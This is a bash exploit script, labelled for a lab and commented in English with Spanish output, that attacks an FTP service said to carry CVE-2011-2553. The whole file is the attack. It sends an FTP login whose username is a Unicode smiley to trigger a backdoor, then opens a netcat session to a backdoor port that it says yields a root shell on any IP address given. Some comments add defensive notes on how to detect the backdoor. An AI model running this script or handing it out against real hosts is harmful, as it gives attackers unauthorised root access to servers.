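#!/bin/bash
# Lab exploit script for CVE-2011-2553 - FTP service vulnerability.
# NOTE(review): the CVE id is reproduced as given on this page; confirm it
# against the advisory for the service under test before citing it.
# Usage: ./exploit.sh <IP> [ftp_port] [backdoor_port]
#
# Positional arguments (with fallbacks):
#   $1  target address          (fallback 172.17.0.2 - looks like a Docker
#                                bridge address, i.e. a local lab container;
#                                confirm)
#   $2  FTP control port        (fallback 21)
#   $3  port of the backdoor    (fallback 5000)
# The script later exits with a usage message when called with no arguments,
# so the address fallback only applies when $1 is passed as an empty string.
IP=${1:-172.17.0.2}
FTP_PORT=${2:-21}
BACKDOOR_PORT=${3:-5000}

# Output colours. These hold the literal backslash sequences; they become
# escape codes only when printed through echo -e or printf %b.
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No colour (reset)

# Returns 0 when $1 is a decimal TCP port in 1..65535, non-zero otherwise.
# 10# forces base 10 so values with leading zeros are not read as octal.
_is_valid_port() {
  [[ $1 =~ ^[0-9]{1,5}$ ]] && ((10#$1 >= 1 && 10#$1 <= 65535))
}

# The three values are handed to nc as arguments further down. Reject a
# target that starts with '-' (it would be parsed as an nc option) and any
# port that is not a plain number, before anything touches the network.
if [[ $IP == -* ]]; then
  printf '%b[!] Error: objetivo inválido: %s%b\n' "$RED" "$IP" "$NC" >&2
  exit 1
fi
for _port in "$FTP_PORT" "$BACKDOOR_PORT"; do
  if ! _is_valid_port "$_port"; then
    printf '%b[!] Error: puerto inválido: %s%b\n' "$RED" "$_port" "$NC" >&2
    exit 1
  fi
done
unset _port

# Banner. User-supplied values go through %s so they are printed verbatim
# instead of being interpreted as escape sequences.
printf '%b[*] Exploit para CVE-2011-2553 - FTP Service%b\n' "$YELLOW" "$NC"
printf '%b[*] Objetivo: %s%b\n' "$YELLOW" "$IP" "$NC"
printf '%b[*] Puerto FTP: %s%b\n' "$YELLOW" "$FTP_PORT" "$NC"
printf '%b[*] Puerto Backdoor: %s%b\n' "$YELLOW" "$BACKDOOR_PORT" "$NC"
echo ""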
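#######################################
# Verify that a command named nc can be resolved before any network step.
# Globals:   RED, NC (read)
# Arguments: none
# Outputs:   on failure, an error line and an install hint on stderr
# Returns:   0 when nc is found; otherwise exits the script with status 1
#######################################
check_nc() {
  if ! command -v nc > /dev/null 2>&1; then
    # Diagnostics go to stderr so they never mix with captured output.
    echo -e "${RED}[!] Error: netcat no está instalado${NC}" >&2
    # NOTE(review): the package name in this hint may differ between
    # distributions - confirm for the platform in use.
    echo "Instala con: apt-get install netcat" >&2
    exit 1
  fi
}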
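#######################################
# Send the three-line FTP exchange (USER / PASS / QUIT) to the target.
# Globals:   IP, FTP_PORT, YELLOW, GREEN, RED, NC (read)
# Arguments: none
# Outputs:   progress on stdout (plus whatever nc prints); error on stderr
# Returns:   0 when nc exits 0; otherwise exits the whole script with 1
#
# The success branch only reflects nc's exit status, i.e. that the lines
# were handed to the connection - it says nothing about how the service
# reacted.
# Defensive note: the exchange is plain-text FTP, so a USER argument carrying
# U+263A is visible to network monitoring, and to the FTP daemon's own logs
# if it records user names.
#######################################
exploit_ftp() {
  printf '%b[*] Conectando al servicio FTP en puerto %s...%b\n' \
    "$YELLOW" "$FTP_PORT" "$NC"
  # USER carries the Unicode smiley U+263A. -w 5 bounds the wait to five
  # seconds. The variables are quoted so each reaches nc as exactly one
  # argument, whatever characters it contains.
  if {
    echo -e "USER \u263A"
    echo "PASS exploit"
    echo "QUIT"
  } | nc -w 5 "$IP" "$FTP_PORT"; then
    echo -e "${GREEN}[+] Payload enviado al servicio FTP${NC}"
  else
    echo -e "${RED}[!] Error al conectar con el servicio FTP${NC}" >&2
    exit 1
  fi
}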
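#######################################
# Open an nc session to the backdoor port on the target.
# Globals:   IP, BACKDOOR_PORT, YELLOW, GREEN, RED, NC (read)
# Arguments: none
# Outputs:   status lines on stdout; the failure message on stderr
# Returns:   0 in both cases - a failed connection is reported, not fatal
#
# Defensive note: what this step probes for is a listener on BACKDOOR_PORT
# that accepts a connection right after the FTP exchange. On a monitored
# host, an FTP server with an unexpected extra listening port is the
# corresponding indicator to check.
#######################################
connect_backdoor() {
  echo ""
  printf '%b[*] Intentando conectar a la backdoor en puerto %s...%b\n' \
    "$YELLOW" "$BACKDOOR_PORT" "$NC"
  echo -e "${GREEN}[+] Si la explotación fue exitosa, deberías tener shell root${NC}"
  echo -e "${YELLOW}[*] Conectando...${NC}"
  echo ""
  # nc inherits the script's stdin/stdout. -w 5 bounds the wait to five
  # seconds. Quoting keeps each variable a single argument.
  if ! nc -w 5 "$IP" "$BACKDOOR_PORT"; then
    echo -e "${RED}[!] No se pudo conectar a la backdoor${NC}" >&2
  fi
}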
#######################################
# Run the steps in order: tool check, FTP exchange, fixed pause, then the
# connection attempt to the backdoor port.
# Globals:   YELLOW, NC (read)
# Arguments: none
# Outputs:   two progress lines on stdout, plus whatever the steps print
# Returns:   the status of connect_backdoor; check_nc and exploit_ftp exit
#            the script themselves on failure
#######################################
main() {
  printf '%b\n' "${YELLOW}[*] Iniciando explotación...${NC}"
  check_nc
  exploit_ftp

  # Fixed two-second pause between the FTP exchange and the connection
  # attempt.
  printf '%b\n' "${YELLOW}[*] Esperando 2 segundos...${NC}"
  sleep 2

  connect_backdoor
}
# On Ctrl-C (INT) or TERM: print an "interrupted" notice and exit 1.
# The single quotes defer expansion of ${RED}/${NC} until the trap fires.
trap 'echo -e "\n${RED}[!] Explotación interrumpida${NC}"; exit 1' INT TERM

# Without any argument, show usage plus two examples and stop with status 1.
if (($# == 0)); then
  printf '%b\n' "${YELLOW}[*] Uso: $0 <IP> [puerto_ftp] [puerto_backdoor]${NC}"
  printf '%b\n' "${YELLOW}[*] Ejemplo: $0 172.17.0.2 21 5000${NC}"
  printf '%b\n' "${YELLOW}[*] Ejemplo: $0 172.17.0.2${NC}"
  exit 1
fi

main